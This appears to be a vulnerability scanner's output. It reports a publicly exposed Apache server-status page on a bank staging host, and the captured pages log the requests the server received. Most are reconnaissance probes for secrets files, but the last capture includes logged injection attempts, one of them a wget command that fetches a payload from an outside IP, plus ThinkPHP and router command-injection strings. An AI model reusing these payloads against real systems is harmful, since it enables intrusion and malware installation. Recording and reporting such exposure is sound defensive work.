SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot M
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2519f4f28e9
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Wednesday, 24-Dec-2025 15:27:42 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 7 Parent Server MPM Generation: 6 Server uptime: 4 days 21 hours 27 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 10475 - Total Traffic: 56.6 MB - Total Duration: 129257 CPU Usage: u19.27 s17.53 cu33.58 cs9.42 - .0189% CPU load .0248 requests/sec - 140 B/second - 5.5 kB/request - 12.3396 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 03997165no1yes10240010 13997166no0yes00250000 Sum201 10490010 ____________________W_____________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-639971650/13/212_ 1.1321014760.00.021.17 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 0-639971650/16/228_ 1.1318011710.00.030.87 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 0-639971650/11/222_ 1.131705800.00.040.95 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 0-639971650/14/212_ 1.1319014550.00.021.05 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 0-639971650/13/206_ 1.1316012290.00.020.79 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 0-639971650/12/221_ 1.1311047740.00.030.97 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 0-639971650/12/220_ 1.131308940.00.030.99 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 0-639971650/11/201_ 1.131404910.00.010.81 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 0-639971650/17/222_ 1.1312028250.00.041.18 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 0-639971650/12/221_ 1.141007120.00.010.85 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 0-639971650/18/208_ 1.14915460.00.041.34 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-639971650/14/223_ 1.147015420.00.020.97 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-639971650/12/213_ 1.147021070.00.020.83 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-639971650/13/212_ 1.142046010.00.041.28 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-639971650/18/224_ 1.146022510.00.051.33 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-639971650/13/216_ 1.143092310.00.051.02 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-639971650/17/218_ 1.142026550.00.031.08 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-639971650/11/212_ 1.1321058110.00.010.95 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 0-639971650/15/208_ 1.141015460.00.010.78 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-639971650/16/233_ 1.1315027370.00.090.98 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 0-6399716525/13/219W 0.860027860.00.011.22 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-639971650/15/213_ 1.12224123280.00.021.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-639971650/12/213_ 1.1221014510.00.020.94 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 0-639971650/10/212_ 1.1221027240.00.011.46 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 0-639971650/14/220_ 1.1221030790.00.031.13 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-639971660/23/207_ 1.627311122520.00.030.92 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/21/199_ 1.62636017500.00.061.42 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-639971660/14/198_ 1.7637726090.00.020.98 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/22/205_ 1.85436836320.00.041.20 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/17/201_ 1.7033667830.00.034.22 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/24/210_ 1.84470241930.00.061.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/18/206_ 1.78131217040.00.060.95 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/25/204_ 1.85382154350.00.061.08 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/22/207_ 1.64465225780.00.060.90 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/22/198_ 1.77336519020.00.071.39 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/18/204_ 1.68431409550.00.031.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/20/201_ 1.85341318800.00.050.91 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/18/219_ 1.6937766590.00.031.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/15/196_ 1.72465037710.00.041.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/17/192_ 1.764312915360.00.020.90 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/20/208_ 1.7013119410.00.091.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/22/204_ 1.86136231990.00.051.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/21/209_ 1.8641113410.00.050.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/20/195_ 1.7936636040.00.031.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/22/201_ 1.83487419340.00.041.01 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-639971660/24/202_ 1.64482214860.00.061.33 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/19/197_ 1.7136129300.00.031.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/19/208_ 1.72482136270.00.030.97 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-639971660/17/193_ 1.72636629820.00.020.82 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-639971660/21/202_ 1.826411525480.00.021.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25139ff44bc
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Monday, 22-Dec-2025 09:19:01 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 2 days 15 hours 19 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 4361 - Total Traffic: 7.3 MB - Total Duration: 11319 CPU Usage: u11.99 s9.73 cu12.63 cs4.05 - .0168% CPU load .0191 requests/sec - 33 B/second - 1763 B/request - 2.59551 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 03637041no1yes10240010 13637042no0yes00250000 Sum201 10490010 _____________W____________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-336370410/16/95_ 2.141002870.00.020.14 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 0-336370410/14/105_ 2.132102160.00.030.18 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 0-336370410/17/107_ 2.132292220.00.040.17 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-336370410/16/103_ 2.131502380.00.030.18 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 0-336370410/18/96_ 2.131702610.00.030.16 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 0-336370410/17/107_ 2.131602740.00.030.18 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 0-336370410/21/110_ 2.15802330.00.040.17 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-336370410/18/91_ 2.131511870.00.030.15 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 0-336370410/18/102_ 2.131302510.00.030.15 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 0-336370410/18/107_ 2.131202620.00.020.17 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 0-336370410/16/91_ 2.15901980.00.030.17 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 0-336370410/19/104_ 2.15102960.00.030.18 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-336370410/12/101_ 2.15102730.00.010.18 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-3363704125/17/99W 1.93001740.00.030.17 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-336370410/19/103_ 2.132102100.00.030.16 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 0-336370410/18/107_ 2.132002360.00.030.17 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 0-336370410/14/106_ 2.15702420.00.030.17 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-336370410/20/103_ 2.15601600.00.030.16 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-336370410/16/101_ 2.132002390.00.020.16 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 0-336370410/20/112_ 2.15502440.00.050.20 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-336370410/19/108_ 2.132002370.00.030.17 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 0-336370410/12/96_ 2.15302410.00.030.14 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-336370410/17/105_ 2.131803200.00.030.17 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 0-336370410/19/101_ 2.15202220.00.040.15 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-336370410/18/102_ 2.141111960.00.030.16 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-336370420/6/75_ 1.30162172230.00.010.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/5/72_ 1.12254312530.00.000.11 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-336370420/7/63_ 1.15141101580.00.010.11 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-336370420/6/70_ 1.32141672310.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/5/77_ 1.221411162080.00.010.15 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/5/70_ 1.15161611750.00.010.12 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-336370420/6/79_ 1.32132112460.00.010.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/68_ 1.22131612320.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/6/71_ 0.91131651830.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/5/65_ 1.3272102520.00.010.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/81_ 1.26716192710.00.020.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/70_ 0.9271661750.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/75_ 1.3421692410.00.010.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/8/80_ 1.2621133600.00.010.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/6/73_ 0.9221102060.00.010.14 127.0.0.1http/1.1127.0.1.1:8080GET /wp-json HTTP/1.1 1-336370420/4/68_ 1.10267112100.00.010.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/66_ 1.27261571670.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/7/77_ 0.92261042580.00.010.14 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/2/71_ 1.122610132350.00.000.13 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/6/73_ 1.28254822030.00.010.14 127.0.0.1http/1.1127.0.1.1:8080GET /SDK/webLanguage HTTP/1.1 1-336370420/8/72_ 1.19254311550.00.020.13 127.0.0.1http/1.1127.0.1.1:8080GET /.git/config HTTP/1.1 1-336370420/5/72_ 1.28222112100.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/7/73_ 1.19221621970.00.010.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-336370420/5/63_ 1.142216141450.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-336370420/6/75_ 1.19161601830.00.010.12 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMi
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2512b3d39e7
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Saturday, 20-Dec-2025 09:52:50 CET Restart Time: Friday, 19-Dec-2025 17:59:48 CET Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 15 hours 53 minutes 2 seconds Server load: 0.00 0.01 0.00 Total accesses: 916 - Total Traffic: 1.8 MB - Total Duration: 2279 CPU Usage: u4.36 s2.9 cu.8 cs.26 - .0146% CPU load .016 requests/sec - 32 B/second - 2011 B/request - 2.48799 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 03340802no0yes00250000 13340803no1yes10240010 Sum201 10490010 ____________________________________W_____________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-133408020/8/13_ 0.9022383520.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/12/20_ 0.7722380350.00.020.05 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-133408020/11/19_ 0.7311305500.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/9/15_ 0.9512710600.00.010.02 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-133408020/7/15_ 0.86113030540.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/8/15_ 0.9710435470.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/10/16_ 0.9512681270.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/9/14_ 0.7310381490.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/10/18_ 0.7212631360.00.020.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/8/14_ 0.8610383350.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/8/13_ 0.977448350.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/8/14_ 0.697390290.00.020.03 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-133408020/8/15_ 0.877397380.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/8/14_ 0.973501290.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/8/14_ 0.703451300.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/8/15_ 0.903455380.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/7/14_ 0.981443450.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/7/13_ 0.8212631240.00.030.05 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-133408020/9/13_ 0.591390480.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET /_all_dbs HTTP/1.1 0-133408020/10/17_ 0.901390280.00.020.04 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-133408020/7/14_ 0.99505300.00.010.03 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/9/13_ 0.90450240.00.010.02 127.0.0.1http/1.1127.0.1.1:8080GET /backend/.env HTTP/1.1 0-133408020/11/17_ 0.774515660.00.010.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-133408020/10/17_ 0.9511351550.00.020.04 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-133408020/6/11_ 0.9422432160.00.010.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-133408030/17/21_ 1.8940430.00.030.04 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-133408030/17/21_ 1.89190900.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-133408030/16/20_ 1.88200220.00.030.04 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-133408030/18/22_ 1.8960530.00.040.04 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-133408030/19/23_ 1.88200400.00.040.05 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-133408030/18/21_ 1.8930520.00.030.04 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-133408030/19/23_ 1.88200460.00.030.04 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-133408030/18/22_ 1.9010850.00.030.04 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-133408030/20/23_ 1.88210340.00.030.03 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-133408030/18/23_ 1.88210440.00.030.04 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-133408030/19/25_ 1.9020580.00.030.04 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-1334080325/19/23W 1.8100400.00.030.05 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-133408030/20/24_ 1.88230360.00.040.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-133408030/17/22_ 1.89170840.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-133408030/19/23_ 1.89170580.00.050.05 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-133408030/15/19_ 1.89160540.00.040.05 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-133408030/16/20_ 1.89150400.00.030.04 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-133408030/21/26_ 1.89140590.00.040.05 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 1-133408030/15/19_ 1.89130570.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-133408030/14/19_ 1.89120270.00.040.05 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-133408030/19/23_ 1.89111570.00.040.05 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-133408030/17/21_ 1.8970630.00.040.04 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-133408030/17/21_ 1.8970430.00.050.06 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-133408030/15/19_ 1.8980470.00.020.03 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-133408030/16/20_ 1.8990400.00.030.03 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request Dur<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251ec8dd1bb
Apache Status
Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1)
Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w
Server MPM: event
Server Built: 2025-07-29T20:18:46
Current Time: Thursday, 18-Dec-2025 11:32:38 CET
Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST
Parent Server Config. Generation: 109
Parent Server MPM Generation: 108
Server uptime: 107 days 18 minutes 12 seconds
Server load: 0.08 0.04 0.00
Total accesses: 260304 - Total Traffic: 1.9 GB - Total Duration: 22477371
CPU Usage: u273.2 s375.2 cu475.3 cs149.42 - .0138% CPU load
.0282 requests/sec - 215 B/second - 7.5 kB/request - 86.3505 ms/request
1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers
SlotPIDStoppingConnections
ThreadsAsync connections
totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing
13042317no1yes10240010
33042316no0yes00250000
Sum201 10490010
.........................___W_____________________..............
..........._________________________............................
......................
Scoreboard Key:
"_" Waiting for Connection,
"S" Starting up,
"R" Reading Request,
"W" Sending Reply,
"K" Keepalive (read),
"D" DNS Lookup,
"C" Closing connection,
"L" Logging,
"G" Gracefully finishing,
"I" Idle cleanup of worker,
"." Open slot with no current process
SrvPIDAccMCPU
SSReqDurConnChildSlotClientProtocolVHostRequest
0-80-0/0/1445.
0.0023743540876330.00.006.44
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1477.
0.0023743540854180.00.006.75
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/login.cgi HTTP/1.1
0-80-0/0/1456.
0.0023743540795740.00.006.64
127.0.0.1http/1.1127.0.1.1:8080POST /goform/mp HTTP/1.1
0-80-0/0/1431.
0.0023743542923170.00.008.09
127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1
0-80-0/0/1471.
0.0023743541959160.00.005.97
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1467.
0.00237435401120610.00.008.87
127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/;wget${IFS}-qO-${IFS}http://74.194.191.52/rondo.sb
0-80-0/0/1496.
0.0023743541980370.00.0022.71
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1464.
0.0023743540872930.00.0028.32
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1469.
0.0023743540954320.00.006.82
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1447.
0.0023743541804010.00.007.07
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.0023743540763390.00.0018.86
127.0.0.1http/1.1127.0.1.1:8080GET /backend/.git/config HTTP/1.1
0-80-0/0/1455.
0.00237435401128510.00.0028.52
127.0.0.1http/1.1127.0.1.1:8080POST /apply.cgi HTTP/1.1
0-80-0/0/1422.
0.0023743541807520.00.007.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1437.
0.00237435401242840.00.007.90
127.0.0.1http/1.1127.0.1.1:8080GET /index.php?s=/Index/\\think\\app/invokefunction&function=call
0-80-0/0/1427.
0.0023743540842500.00.0014.61
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/cgi_main.cgi HTTP/1.1
0-80-0/0/1452.
0.0023743540873780.00.005.65
127.0.0.1http/1.1127.0.1.1:8080GET /__down?bytes=10 HTTP/1.1
0-80-0/0/1450.
0.0023743541758340.00.007.28
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1422.
0.0023743541872420.00.0015.27
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1436.
0.0023743540839090.00.005.78
127.0.0.1http/1.1127.0.1.1:8080GET /HNAP1/ HTTP/1.1
0-80-0/0/1458.
0.0023743540861330.00.0019.53
127.0.0.1http/1.1127.0.1.1:8080POST /dvr/cmd HTTP/1.1
0-80-0/0/1430.
0.0023743541844070.00.007.30
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
0-80-0/0/1428.
0.0023743540940400.00.0012.18
127.0.0.1http/1.1127.0.1.1:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20
0-80-0/0/1445.
0.0023743540882420.00.007.60
127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/system_mgr.cgi? HTTP/1.1
0-80-0/0/1453.
0.0023743540866550.00.007.23
127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1
0-80-0/0/1422.
0.0023743541852040.00.006.35
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10830423170/24/3939_
1.772003452870.00.0726.40
127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1
1-10830423170/20/3874_
1.771903269940.00.0526.69
127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1
1-10830423170/14/3727_
1.772303324420.00.0525.86
127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1
1-108304231724/12/3854W
1.71003414370.00.0625.00
127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1
1-10830423170/20/3880_
1.653513346000.00.1025.82
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10830423170/19/3821_
1.78103145100.00.1028.42
127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
1-10830423170/20/3885_
1.772413762690.00.0724.39
127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1
1-10830423170/16/3893_
1.772003339370.00.0325.53
127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1
1-10830423170/20/3780_
1.772003395070.00.0625.98
127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1
1-10830423170/24/3835_
1.771803106650.00.0824.03
127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1
1-10830423170/21/3921_
